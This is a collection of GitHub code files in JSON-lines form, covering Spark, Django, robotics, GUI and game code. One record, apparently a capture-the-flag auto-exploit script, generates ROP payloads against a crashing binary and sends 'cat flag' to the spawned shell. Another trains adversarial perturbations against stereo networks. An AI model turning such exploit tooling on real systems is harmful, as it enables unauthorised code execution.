restart your kernel for any errors.\nsc = SparkContext()\n\nssc = StreamingContext(sc, 10 )\nsqlContext = SQLContext(sc)\nsocket_stream = ssc.socketTextStream(\"127.0.0.1\", 5555)\nlines = socket_stream.window( 20 )\nfrom collections import namedtuple\nfields = (\"tag\", \"count\" )\nTweet = namedtuple( 'Tweet', fields )\n# Use Parenthesis for multiple lines or use \\.\n( lines.flatMap( lambda text: text.split( \" \" ) ) #Splits to a list\n .filter( lambda word: word.lower().startswith(\"#\") ) # Checks for hashtag calls\n .map( lambda word: ( word.lower(), 1 ) ) # Lower cases the word\n .reduceByKey( lambda a, b: a + b ) # Reduces\n .map( lambda rec: Tweet( rec[0], rec[1] ) ) # Stores in a Tweet Object\n .foreachRDD( lambda rdd: rdd.toDF().sort( desc(\"count\") ) # Sorts Them in a DF\n .limit(10).registerTempTable(\"tweets\") ) ) # Registers to a table.","repo_name":"JacobMonksRev/BigData05312022","sub_path":"Notes/Week9/Twitter_Stream/spark_st_run.py","file_name":"spark_st_run.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"20436454649","text":"from django.shortcuts import render,HttpResponse,redirect,get_object_or_404\nfrom .models import Cancer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import SGD\nfrom sklearn.impute import SimpleImputer\nimport numpy as np\nimport pandas as pd\n# from .myform import MyForm\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef features(request):\n return render(request, \"features.html\")\n\ndef price(request):\n return render(request, \"pricing.html\")\n\ndef blog(request):\n return render(request, \"blog.html\")\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef cancer(request):\n cancers = Cancer.objects.all()\n\n return render(request, \"test.html\",{\"cancers\":cancers})\n\ndef addCancer(request):\n # f = MyForm()\n if request.method == \"GET\":\n return redirect(\"/cancer\")\n else:\n # Hasta Kişisel Bilgileri\n tc = request.POST.get(\"tc\")\n firstName = request.POST.get(\"firstName\")\n lastName = request.POST.get(\"lastName\")\n length = request.POST.get(\"length\")\n age = request.POST.get(\"age\")\n sex = request.POST.get(\"sex\")\n city = request.POST.get(\"city\")\n country = request.POST.get(\"country\")\n # ************Yapay Zeka Alanı****************\n # verilerimizi okuyup değişkenimizin içine atıyorum\n veri = pd.read_csv(\"datasets/breast-cancer.data\")\n # verisetimizde bulunan \"?\" yani bilinmeyen kısımları hesaplanmaması için -99999 gibi bir değer veriyorum\n veri.replace('?', -99999, inplace=True)\n veriyeni = veri.drop(['1000025'], axis=1)\n imp = SimpleImputer(missing_values=-99999, strategy=\"mean\", fill_value=None, verbose=0, copy=True)\n veriyeni = imp.fit_transform(veriyeni) # sklearn\n # 8 adet özelliğe bağlı bir giriş katmanımız var \n # (Hücre Boyutunun Düzgünlüğü, Hücre Şeklinin Düzgünlüğü, Marjinal Yapışma, Tek Epitel Hücre Boyutu,\n # Çıplak Çekirdekler, Uyumlu Kromatin, Normal Nikloeller, Normal Nikloeller, Mitoz)\n # bu 8 katmana göre 1 tane veriyi tahmin etmeye çalışıyoruz\n giris = veriyeni[:, 0:8] # giris.shape => (698,8) 8 özelliğe bağlı giriş katmanımız\n cikis = veriyeni[:, 9] # cikis.shape => 8 özellikten tahmin ettiğimiz çıkış katmanımız\n # *** VERİ SETİ İŞLEMLERİ TAMAM ŞİMDİ MODELİMİZİ OLUŞTURALIM\n # bu altta 
vereceğim fotoğraf sequential le alakalı sunumda felan kullanıp 63 ve 64.satırları sil\n # https://bilimfili.com/wp-content/uploads/2015/12/yapay-sinir-aglari1-bilimfilicom.jpg\n model = Sequential() # Yapay sinir ağları algılayıcıların ardışık olmasına bağlı \n # Dense: yapay sinir ağında görülen her ağ kendinden sonraki noktalara bağlı\n # input dimension ' a kaç tane özelliğimiz olduğunu yazıyoruz biz 8 özellikten output u tahmin edeceğiz\n model.add(Dense(10, input_dim=8))\n # Aktivasyon fonksiyonuna sokalım\n # Step Fonksiyonu: Bir eşik değeri alarak ikili bir sınıflandırma çıktısı (0 yada 1) üretir.\n # Sigmoid Fonksiyonu: En yaygın kullanılan aktivasyon fonksiyonlarından birisidir, [0,1] aralığında çıktı üretir.\n # Tanh Fonksiyonu: [-1,1] aralığında çıktı üreten doğrusal olmayan bir fonksiyondur.\n # ReLU Fonksiyonu: Doğrusal olmayan bir fonksiyondur. ReLU fonksiyonu negatif girdiler için 0 değerini alırken, x pozitif girdiler için x değerini almaktadır.\n # Softmax Fonksiyonu: Çoklu sınıflandırma problemleri için kullanılan bu fonksiyon, verilen her bir girdinin bir sınıfa ait olma olasılığını gösteren [0,1] arası çıktılar üretmektedir.\n # Softplus Fonksiyonu: Sigmoid ve Tanh gibi geleneksel aktivasyon fonksiyonlarına alternatif olarak sunulan bu fonksiyon (0, +∞) aralığında türevlenebilir bir çıktı üretmektedir.\n # ELU Fonksiyonu: Üstel lineer birim, negatif girdiler hariç ReLU ile benzerdir. Negatif girdilerde ise genellikle 1.0 alınan alfa parametresi almaktadır.\n # PReLU Fonksiyonu: Parametrik ReLU olarak geçen bu aktivasyon fonksiyonu da negatif girdiler için extra alfa sabiti ile verilen girdinin çarpım sonucunu çıktı olarak üretmektedir.\n # Swish Fonksiyonu: Google araştırmacıları tarafından yeni keşfedilen bu fonksiyon girdiler ile sigmoid fonksiyonunun çarpımını çıktı olarak üretmektedir.\n # İlk başta hidden layers kısmını yazdık şimdi aktivasyon fonksiyonuyla verilerimizi normalize ettik yani 0-1 arasına yerleştirdik\n # NEDEN RELU yu kullandık?\n # Matrislerde sürekli y = mx + b işlemi çalışacağı için çok yüksek değerler elde ediyoruz biz bunu belli bir değer arasına sokmamız lazım\n # bunun için aktivasyon fonksiyonu kullanıyoruz verilerimizi 0 ile 1 arasına sokuyoruz \n model.add(Activation('relu')) # model.add(Activation('tanh')) daha hızlı sonuç verdi\n # Katmandaki node ların yarısını o tekrar içine sokmuyor eğer 0.2 yazılırsa 5'te 1 ini o tekrar için işleme sokmaz.\n # farklı node ları işleme sokmamızın nedeni veri seti ezberinin önüne geçmek için yapıyoruz \n # eğer dropout kullanmazsak tahminimiz %100 olur fakat bu ezberlenmiş bir model demektir bizim için makul değer %90-%95 \n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('relu')) # model.add(Activation('tanh'))\n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('softmax')) # hep en sonda tut\n # Yapay sinir ağımızı oluşturduk \n # lr: learning rate =>Ne kadar hızlı öğreneceğimizi anlamaya çalışan bir sistem\n # lr ile epoch arasında ters orantı var\n # lr yi düşük alrısak epoch değerini yüksek almamız gerekir \n optimizer = keras.optimizers.SGD(lr=0.01)\n # gerçek-tahmini karesini alıp türevini 0 a eşitliyoruz \n # algoritmamızın ne kadar doğru ne kadar yanlış yaptığını anlamak için metrics = accuracy yapıyoruz \n model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n # modelimiz bitti şimdi bu verileri modele yerleştirmek kaldı \n # 2: iyi huylu tümör, 4: kötü huylu tümör\n # epochs: veri setini ayrı ayrı 10 kere 
tarayacak\n # batch_size: aynı anda kaç bit lik işlemi hafızaya alsın yazılmazsa kendisi otomatik değer atar.\n # validation_split: (Doğrulama kısmı) bütün verimizin bir kısmını yapay sinir ağımıza yerleştirelim\n # Elimizde kalan sinir ağına sokmadığımız işlenmemiş veriyi veri setine sokarak tahmin etmesini sağlayacağız.\n # eğer tamamıyla işleme sokarsak model verileri ezberler. Bizim amacımız görmeden tahmin etmesi \n model.fit(giris, cikis, epochs=10, batch_size=32, validation_split=0.20)\n # inputlar\n uniformity_cell_size = request.POST.get(\"uniformity_cell_size\")\n uniformity_cell_shape = request.POST.get(\"uniformity_cell_shape\")\n marginal_adhesion = request.POST.get(\"marginal_adhesion\")\n single_epithelial_cell_size = request.POST.get(\"single_epithelial_cell_size\")\n bare_nuclei = request.POST.get(\"bare_nuclei\")\n bland_chromatin = request.POST.get(\"bland_chromatin\")\n normal_nucleoli = request.POST.get(\"normal_nucleoli\")\n mitoses = request.POST.get(\"mitoses\")\n #a = 5\n #b = 5\n #c = 5\n #d = 8\n #e = 10\n #f = 8\n #g = 7\n #h = 3\n tahmin = np.array(\n [\n uniformity_cell_size,\n uniformity_cell_shape,\n marginal_adhesion,\n single_epithelial_cell_size,\n bare_nuclei,\n bland_chromatin,\n normal_nucleoli,\n mitoses\n ]\n ).reshape(1, 8)\n print(model.predict_classes(tahmin))\n result = model.predict_classes(tahmin)\n newCancer = Cancer(\n tc=tc,\n firstName=firstName,\n lastName=lastName,\n length=length,\n age=age,\n sex=sex,\n city=city,\n country=country,\n uniformity_cell_size=uniformity_cell_size,\n uniformity_cell_shape=uniformity_cell_shape,\n marginal_adhesion=marginal_adhesion,\n single_epithelial_cell_size=single_epithelial_cell_size,\n bare_nuclei=bare_nuclei,\n bland_chromatin=bland_chromatin,\n normal_nucleoli=normal_nucleoli,\n mitoses=mitoses,\n result = result\n )\n newCancer.save()\n return redirect(\"/cancer\")\n\n# Kayıt Silme\ndef deleteResult(request,id):\n cancer= get_object_or_404(Cancer, id = id)\n cancer.delete()\n return redirect(\"/cancer\")","repo_name":"Yigit-dev/Breast-Cancer-Detection-with-Artificial-Intelligence","sub_path":"Project/project/cancer/views-with-Comments.py","file_name":"views-with-Comments.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16016986306","text":"import autograd.numpy as np\n\nimport gym\nfrom trajopt.gps import MBGPS\n\nimport matplotlib.pyplot as plt\n\nfrom joblib import Parallel, delayed\n\nimport multiprocessing\nnb_cores = multiprocessing.cpu_count()\n\n\ndef create_job(kwargs):\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n # pendulum env\n env = gym.make('Pendulum-TO-v0')\n env._max_episode_steps = 10000\n env.unwrapped.dt = 0.02\n env.unwrapped.umax = np.array([2.5])\n env.unwrapped.periodic = False\n\n dm_state = env.observation_space.shape[0]\n dm_act = env.action_space.shape[0]\n\n state = env.reset()\n init_state = tuple([state, 1e-4 * np.eye(dm_state)])\n solver = MBGPS(env, init_state=init_state,\n init_action_sigma=25., nb_steps=300,\n kl_bound=.1, action_penalty=1e-3,\n activation={'shift': 250, 'mult': 0.5})\n\n solver.run(nb_iter=100, verbose=False)\n\n solver.ctl.sigma = np.dstack([1e-1 * np.eye(dm_act)] * 300)\n data = solver.rollout(nb_episodes=1, stoch=True, init=state)\n\n obs, act = np.squeeze(data['x'], axis=-1).T, np.squeeze(data['u'], axis=-1).T\n return obs, act\n\n\ndef parallel_gps(nb_jobs=50):\n kwargs_list = [{} for _ in range(nb_jobs)]\n results = 
Parallel(n_jobs=min(nb_jobs, 20),\n verbose=10, backend='loky')(map(delayed(create_job), kwargs_list))\n obs, act = list(map(list, zip(*results)))\n return obs, act\n\n\nobs, act = parallel_gps(nb_jobs=50)\n\nplt.figure()\nfig, ax = plt.subplots(nrows=3, ncols=1, figsize=(12, 4))\nfor _obs, _act in zip(obs, act):\n ax[0].plot(_obs[:, :-1])\n ax[1].plot(_obs[:, -1])\n ax[2].plot(_act)\nplt.show()\n\nimport pickle\ndata = {'obs': obs, 'act': act}\npickle.dump(data, open(\"gps_pendulum_other.pkl\", \"wb\"))\n","repo_name":"hanyas/trajopt","sub_path":"examples/gps/analytical/topt/mb_pendulum_parallel.py","file_name":"mb_pendulum_parallel.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"} +{"seq_id":"35353236233","text":"import wx\n\nclass MyApp(wx.App):\n\tdef OnInit(self):\n\t\tmyframe = wx.Frame(None,-1,'test')\n\t\tmytext = wx.TextCtrl(myframe,-1,style=wx.TE_READONLY)\t# we display the selection in it\n\t\tmytree = wx.TreeCtrl(myframe,-1,style=wx.TR_HAS_BUTTONS|wx.TR_SINGLE)\t# only one item can be selected !\n\t\trootItem = mytree.AddRoot('Root')\n\t\t# populate the tree\n\t\tfor i in range(10):\n\t\t\ttmpkey = 'key_%s'%i\n\t\t\titem = mytree.AppendItem(rootItem,tmpkey)\n\t\t\tfor j in range(10):\n\t\t\t\tmytree.AppendItem(item,'tmpkey_%s'%j)\n\t\tmytree.Expand(rootItem)\n\t\t# set events\n\t\twx.EVT_TREE_BEGIN_DRAG(mytree,mytree.GetId(),lambda evt: evt.Allow())\n\t\twx.EVT_TREE_SEL_CHANGED(mytree,mytree.GetId(),lambda evt: mytext.SetValue(mytree.GetItemText(mytree.GetSelection())))\n\t\t# layout\n\t\ts = wx.BoxSizer(wx.HORIZONTAL)\n\t\ts.Add(mytree,1,wx.EXPAND)\n\t\ts.Add(mytext,0,0)\n\t\tmyframe.SetSizer(s)\n\t\tmyframe.Layout()\n\t\t# show the window\n\t\tmyframe.Show()\n\t\treturn True\n\t\t\nmyApp = MyApp()\nmyApp.MainLoop()\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/487/4874f491eab06ba3e0df4386a569fb51c7c548f1/4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_name":"4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13745041989","text":"'''\nAuthor: Zachery Berger <zackeberger@g.ucla.edu>, Parth Agrawal <parthagrawal24@g.ucla.edu>, Tian Yu Liu <tianyu139@g.ucla.edu>, Alex Wong <alexw@cs.ucla.edu>\nIf you use this code, please cite the following paper:\n\nZ. Berger, P. Agrawal, T. Liu, S. Soatto, and A. Wong. 
Stereoscopic Universal Perturbations across Different Architectures and Datasets.\nhttps://arxiv.org/pdf/2112.06116.pdf\n\n@inproceedings{berger2022stereoscopic,\n title={Stereoscopic Universal Perturbations across Different Architectures and Datasets},\n author={Berger, Zachery and Agrawal, Parth and Liu, Tian Yu and Soatto, Stefano and Wong, Alex},\n booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},\n year={2022}\n}\n'''\n\nimport argparse\nimport global_constants as settings\nfrom perturb_main import train\n\n\nparser = argparse.ArgumentParser()\n\n# Training and validation input filepaths\nparser.add_argument('--train_image0_path',\n type=str, required=True, help='Path to list of left image paths')\nparser.add_argument('--train_image1_path',\n type=str, required=True, help='Path to list of right image paths')\nparser.add_argument('--train_pseudo_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\nparser.add_argument('--val_image0_path',\n type=str, default=None, help='Path to list of left image paths')\nparser.add_argument('--val_image1_path',\n type=str, default=None, help='Path to list of right image paths')\nparser.add_argument('--val_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\n\n# Perturbation model settings\nparser.add_argument('--n_image_height',\n type=int, default=settings.N_IMAGE_HEIGHT, help='Height of each sample')\nparser.add_argument('--n_image_width',\n type=int, default=settings.N_IMAGE_WIDTH, help='Width of each sample')\nparser.add_argument('--output_norm',\n type=float, default=settings.OUTPUT_NORM, help='Output norm of noise')\nparser.add_argument('--gradient_scale',\n type=float, default=settings.GRADIENT_SCALE, help='Value to scale gradients by')\nparser.add_argument('--attack',\n type=str, default=settings.ATTACK, help='Perturbation attack method: [full, tile]')\nparser.add_argument('--n_perturbation_height',\n type=int, default=settings.N_PERTURBATION_HEIGHT, help='Height of perturbation')\nparser.add_argument('--n_perturbation_width',\n type=int, default=settings.N_PERTURBATION_WIDTH, help='Width of perturbation')\n\n# Optimization settings\nparser.add_argument('--n_batch',\n type=int, default=settings.N_BATCH, help='Number of samples per batch')\nparser.add_argument('--n_epoch',\n type=int, default=settings.N_EPOCH, help='Number of samples per batch')\n\n# Stereo model settings\nparser.add_argument('--stereo_method',\n type=str, default=settings.STEREO_METHOD, help='Stereo method available: %s' % settings.STEREO_METHOD_AVAILABLE)\nparser.add_argument('--stereo_model_restore_path',\n type=str, default='', help='Path to restore model checkpoint')\nparser.add_argument('--num_deform_layers',\n type=int, default=0, help='Number of deformable convolution layers [0, 6, 25]')\n\n# Checkpoint settings\nparser.add_argument('--n_checkpoint',\n type=int, default=settings.N_CHECKPOINT, help='Number of steps before saving a checkpoint')\nparser.add_argument('--checkpoint_path',\n type=str, required=True, help='Path to save checkpoints')\n\n# Hardware settings\nparser.add_argument('--n_worker',\n type=int, default=settings.N_WORKER, help='Number of workers/threads to use')\nparser.add_argument('--device',\n type=str, default=settings.DEVICE, help='Device to use: gpu, cpu')\n\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n\n args.stereo_method = args.stereo_method.lower()\n\n args.device = args.device.lower()\n\n if 
args.device not in [settings.GPU, settings.CPU, settings.CUDA]:\n args.device = settings.CUDA\n\n args.device = settings.CUDA if args.device == settings.GPU else args.device\n\n train(train_image0_path=args.train_image0_path,\n train_image1_path=args.train_image1_path,\n train_pseudo_ground_truth_path=args.train_pseudo_ground_truth_path,\n val_image0_path=args.val_image0_path,\n val_image1_path=args.val_image1_path,\n val_ground_truth_path=args.val_ground_truth_path,\n # Perturbation model settings\n n_image_height=args.n_image_height,\n n_image_width=args.n_image_width,\n output_norm=args.output_norm,\n gradient_scale=args.gradient_scale,\n attack=args.attack,\n n_perturbation_height=args.n_perturbation_height,\n n_perturbation_width=args.n_perturbation_width,\n # Optimization settings\n n_batch=args.n_batch,\n n_epoch=args.n_epoch,\n # Stereo model settings\n stereo_method=args.stereo_method,\n stereo_model_restore_path=args.stereo_model_restore_path,\n num_deform_layers=args.num_deform_layers,\n # Checkpoint settings\n n_checkpoint=args.n_checkpoint,\n checkpoint_path=args.checkpoint_path,\n # Hardware settings\n n_worker=args.n_worker,\n device=args.device)\n","repo_name":"alexklwong/stereoscopic-universal-perturbations","sub_path":"src/train_perturb_model.py","file_name":"train_perturb_model.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"1425350306","text":"# D3 12649 N Castle\n# 아직 x\n\ndef dfs(level):\n # 현재 level 에서 선택할수 있는 x 좌표는 0 1 2\n if level == N :\n de = - 1\n return\n for x in range(N):\n if used[x] == 1 :\n continue\n used[x] = 1 # x좌표 사용(이후의 재귀호출에서 재사용 방지)\n dfs(level+1)\n used[x] = 0 # 원상복구\n return\n \nfor _ in range(10):\n N = int(input())\n dfs(N)\n\nused = [0] * N # 0 1 2 의 사용 여부\n\n\n","repo_name":"hhongjj/Algorithm","sub_path":"SWEA/D3/D3_12649_NCastle.py","file_name":"D3_12649_NCastle.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18581653828","text":"from .x86_attack.init import *\nfrom .x86_attack.analyze import *\nimport sys\nfrom .x86_attack.shell_craft import *\n\nif __name__ == '__main__':\n info = {}\n lcs = {}\n rop_and_index = {}\n payload = []\n flag = []\n binary = sys.argv[1]\n crash_file = sys.argv[2]\n f = open(crash_file, 'r')\n crash = f.read()\n f.close()\n\n init = init(binary, crash_file)\n info = init.get_state()\n #print INFO\n\n analyze = analyze(info, binary, crash)\n lcs = analyze.find_lcs()\n if lcs == -1:\n sys.exit(0)\n rop_and_index = analyze.calc_index()\n\n shell = shell_craft(binary, crash, rop_and_index, info)\n payload = shell.create_payload()\n\n for i in payload:\n p = process(binary)\n\n p.sendline(i)\n p.sendline('echo zxcv;cat flag;')\n try:\n p.recvuntil('zxcv\\n')\n flag.append(p.recvuntil('}'))\n p.close()\n except:\n p.close()\n pass\n\n for i in flag:\n if i is not '':\n log.info(i)\n\n\n\n\n\n\n\n","repo_name":"t3ls/rex-r","sub_path":"rexR-V1.0.5-release/x86_attack/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"12904739789","text":"\"\"\"\nThis module defines how variables are tracked in order to send to Max via OSC.\n\nThere are various Stat objects that record specific types of variables or record variables\nin specific ways, as well as the StatManager object which 
defines all stats to record and send.\n\nAuthor: Gregg Oliva\n\"\"\"\n\n# stdlib imports\nfrom typing import Any, Dict, List, Union\n\n# project imports\nimport debug\nfrom defs import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n PROJECTILE_TYPES,\n REST, NUM_VOICES,\n FPS,\n RECORD_MUSIC\n)\nfrom osc_client import osc, OSCHandler\n\n\nclass Stat:\n \"\"\"A simple Number Stat to be sent via OSC\"\"\"\n def __init__(self, value: Any, send: bool = True) -> None:\n self.value = value\n self.send = send\n\n def update(self, value: Any) -> None:\n \"\"\"Set the value of this stat to a different object\"\"\"\n self.value = value\n\n def __add__(self, other) -> \"Stat\":\n stat = Stat(self.value + other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value + other, self.send)\n\n return stat\n\n def __sub__(self, other) -> \"Stat\":\n stat = Stat(self.value - other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value - other, self.send)\n\n return stat\n\n def __mul__(self, other) -> \"Stat\":\n stat = Stat(self.value * other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value * other, self.send)\n\n return stat\n\n def __div__(self, other) -> \"Stat\":\n stat = Stat(self.value / other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value / other, self.send)\n\n return stat\n\n def __truediv__(self, other) -> \"Stat\":\n return self.__div__(other)\n\n def __lt__(self, other) -> bool:\n return self.value < other.value \\\n if isinstance(other, Stat) \\\n else self.value < other\n\n def __le__(self, other) -> bool:\n return self.value <= other.value \\\n if isinstance(other, Stat) \\\n else self.value <= other\n\n def __eq__(self, other) -> bool:\n return self.value == other.value \\\n if isinstance(other, Stat) \\\n else self.value == other\n\n def __ne__(self, other) -> bool:\n return self.value != other.value \\\n if isinstance(other, Stat) \\\n else self.value != other\n\n def __gt__(self, other) -> bool:\n return self.value > other.value \\\n if isinstance(other, Stat) \\\n else self.value > other\n\n def __ge__(self, other) -> bool:\n return self.value >= other.value \\\n if isinstance(other, Stat) \\\n else self.value >= other\n\n def __str__(self) -> str:\n return str(self.value)\n\n def __repr__(self) -> str:\n return str(f'Stat(Value={self.value}, OSC={self.send})')\n\n\nclass TextStat:\n \"\"\"A stat that tracks strings\"\"\"\n def __init__(self, initial_text: str = '', send: bool = True) -> None:\n self.text = initial_text\n self.send = send\n\n def update(self, text: str) -> None:\n \"\"\"Update the string\"\"\"\n self.text = text\n\n def __str__(self) -> str:\n return self.text\n\n def __repr__(self) -> str:\n return str(f'TextStat(Text={self.text})')\n\n\nclass TimeStat:\n \"\"\"A stat that tracks time in ms, seconds, minutes, and hours\"\"\"\n def __init__(self, total_ms, send: bool = True) -> None:\n self.total_ms = total_ms\n self.send = send\n\n seconds, self.ms = divmod(self.total_ms, 1000)\n minutes, self.seconds = divmod(seconds, 60)\n self.hours, self.minutes = divmod(minutes, 60)\n\n @property\n def time(self):\n \"\"\"Represents Time as a tuple of Hours, Minutes, Seconds, and Ms\"\"\"\n return (self.hours, self.minutes, self.seconds, self.ms)\n\n @property\n def time_display(self) -> str:\n \"\"\"\n Display the time in a format that makes sense with how much time has ellapsed.\n e.g. 
as (4 minutes 32 seconds), (24 seconds), (1 hour 3 minutes 10 seconds),\n\n This function is useful for displaying Time Stats in the DEATH MENU\n \"\"\"\n time_str = [f'{self.seconds} Seconds']\n if self.minutes > 0:\n time_str.insert(0, f'{self.minutes} Minutes')\n if self.hours > 0:\n time_str.insert(0, f'{self.hours} Hours')\n return ' '.join(time_str)\n\n def __sub__(self, other) -> \"TimeStat\":\n if isinstance(other, TimeStat):\n return TimeStat(self.total_ms - other.total_ms)\n elif isinstance(other, (int, float)):\n return TimeStat(self.total_ms - other)\n else:\n raise TypeError(f'{self.__class__} unable to perform subtraction with type: {type(other)}')\n\n def __str__(self) -> str:\n return str(self.total_ms)\n\n def __repr__(self) -> str:\n return str(f'TimeStat(Hours={self.hours}, Minutes={self.minutes}, Seconds={self.seconds}, Milliseconds={self.ms})')\n\n\nclass TrackerStat:\n \"\"\"\n Tracks information about a numerical Stat that changes/updates frequently.\n\n Tracks the following:\n 1) Min. value recorded\n 2) Avg. of all values recorded\n 3) The most recent value recorded\n 4) Max. value recorded\n 5) Total number of values recorded\n\n \"\"\"\n def __init__(self, send_mode: int = 0, send: bool = True) -> None:\n self.sum = 0\n self.last = 0\n self.count = 0\n self.min = float('inf')\n self.max = float('-inf')\n\n if send_mode > len(self.list):\n send_mode = 0\n\n self.send_mode = send_mode\n self.send = send\n\n @property\n def avg(self) -> float:\n \"\"\"\n Calculate the average of all tracked values\n \"\"\"\n if self.count > 0:\n return self.sum / self.count\n else:\n return 0\n\n @property\n def list(self) -> List:\n \"\"\"\n All tracked values as a List\n \"\"\"\n return [self.min, self.avg, self.last, self.max, self.count]\n\n @property\n def value(self) -> Union[int, float, List]:\n \"\"\"\n Returns one or more of the tracked values depending on the send_mode\n\n send_mode = 0: Return all tracked values as a list\n send_mode = 1: Return the min\n send_mode = 2: Return the avg\n send_mode = 3: Return the most recent\n send_mode = 4: Return the max\n send_mode = 5: Return the count\n \"\"\"\n if self.send_mode == 0:\n return self.list\n\n return self.list[self.send_mode - 1]\n\n def add(self, val: float):\n \"\"\"\n Add a new value to be tracked\n \"\"\"\n self.last = val\n self.sum += val\n self.count += 1\n if val > self.max:\n self.max = val\n if val < self.min:\n self.min = val\n\n def __str__(self) -> str:\n return str(self.avg)\n\n def __repr__(self) -> str:\n return str(f'TrackerStat(Average={self.avg}, Last={self.last} Count={self.count}, Min={self.min}, Max={self.max})')\n\n\nclass CounterStat:\n \"\"\"A stat that maps strings to counts\"\"\"\n def __init__(self, init_values: List[str] = None, send: bool = True) -> None:\n self._items = {} if init_values is None else {key: 0 for key in init_values}\n self.count = 0\n self.send = send\n\n @property\n def items(self) -> List[Union[str, int]]:\n \"\"\"\n Returns a List of tuple pairs: (item_str, item_count)\n \"\"\"\n items_list = []\n for key, val in self._items.items():\n items_list.extend([key, val])\n return items_list\n\n def get(self, item: str) -> int:\n \"\"\"Get an item by name\"\"\"\n return self._items[item]\n\n def increase(self, item: str) -> None:\n \"\"\"Increase the value of an item, or add the item to the map\"\"\"\n if item not in self._items:\n self._items[item] = 1\n else:\n self._items[item] += 1\n\n self.count += 1\n\n\nclass ListStat:\n \"\"\"A stat that tracks Lists\"\"\"\n def 
__init__(self, initial_length: int = 0, initial_fill: int = 0, send: bool = True) -> None:\n self.list = [initial_fill for _ in range(initial_length)]\n self.send = send\n\n def add_at_index(self, index: int, val: int):\n \"\"\"Increase the value at the index by one\"\"\"\n self.list[index] += val\n\n def update(self, *vals: int):\n \"\"\"Update the entire list to equal this new list\"\"\"\n for idx, val in enumerate(vals):\n self.list[idx] = val\n\n def get(self, index: int) -> Stat:\n \"\"\"Return an element from the list at the given index\"\"\"\n return Stat(self.list[index])\n\n def __str__(self) -> str:\n return str(', '.join(self.list))\n\n def __repr__(self) -> str:\n return str(f'ListStat(List={self.list})')\n\n\nclass StatTracker:\n \"\"\"\n Tracks all game information as Stats.\n\n Displays some of these stats at the end DEATH MENU.\n\n Sends relevant stats over OSC at the provided port.\n \"\"\"\n\n OUTPUT_STATS_FORMAT = [\n 'SCORE: {buffer}{value}',\n 'ENEMIES KILLED: {buffer}{value}',\n 'PLAYER ACCURACY: {buffer}{value}%',\n 'PLAYER HEALTH LOST: {buffer}{value}',\n 'NOTES RECOVERED: {buffer}{value}',\n 'UPGRADES PICKED UP: {buffer}{value}',\n 'TIME SURVIVED: {buffer}{value}',\n 'TOTAL TIME PLAYED: {buffer}{value}',\n ]\n\n def __init__(self, osc: OSCHandler) -> None:\n self.osc = osc\n\n # Stats that track throughout each playthrough\n self.control__max_init = Stat(0)\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__max_quit = Stat(0)\n self.control__output_device = TextStat()\n self.control__fps = Stat(FPS)\n self.control__num_voices = Stat(NUM_VOICES)\n self.control__screen_width = Stat(SCREEN_WIDTH)\n self.control__screen_height = Stat(SCREEN_HEIGHT)\n self.control__record_music = Stat(RECORD_MUSIC)\n\n self.game__play_count = Stat(0)\n self.game__time__total_played = TimeStat(0)\n\n def init_new_playthrough(self, start_time_ms: int = 0, player_max_health: int = 0):\n \"\"\"Reset Stats on a new Playthrough\"\"\"\n\n # Time trackers\n self.start_time = start_time_ms\n self.time_last_enemy_killed = start_time_ms\n self.time_player_last_hit = start_time_ms\n self.time_last_collected_note = start_time_ms\n\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__reset_music = Stat(0)\n\n self.game__score = Stat(0)\n self.game__total_frames = Stat(0)\n self.game__time__current_playthrough = TimeStat(0)\n self.game__num_events = Stat(0)\n self.game__percent__note_over_enemy_score = Stat(50.)\n\n self.player__starting_position = ListStat(initial_length=2)\n self.player__starting_angle = Stat(0)\n self.player__position = ListStat(initial_length=2)\n self.player__vertical_half = TextStat()\n self.player__horizontal_half = TextStat()\n self.player__frames__moving_and_rotating = Stat(0)\n self.player__frames__moving = Stat(0)\n self.player__frames__still = Stat(0)\n self.player__frames__rotating = Stat(0)\n self.player__frames__firing = Stat(0)\n self.player__frames__per_screen_quadrant = ListStat(initial_length=4)\n self.player__frames__per_angle_quadrant = ListStat(initial_length=4)\n self.player__percent__firing_weapon = Stat(0.)\n self.player__percent__moving_over_rotating = Stat(50.)\n self.player__percent__moving_and_rotating = Stat(50.)\n self.player__percent__health_lost_over_gained = Stat(50.)\n 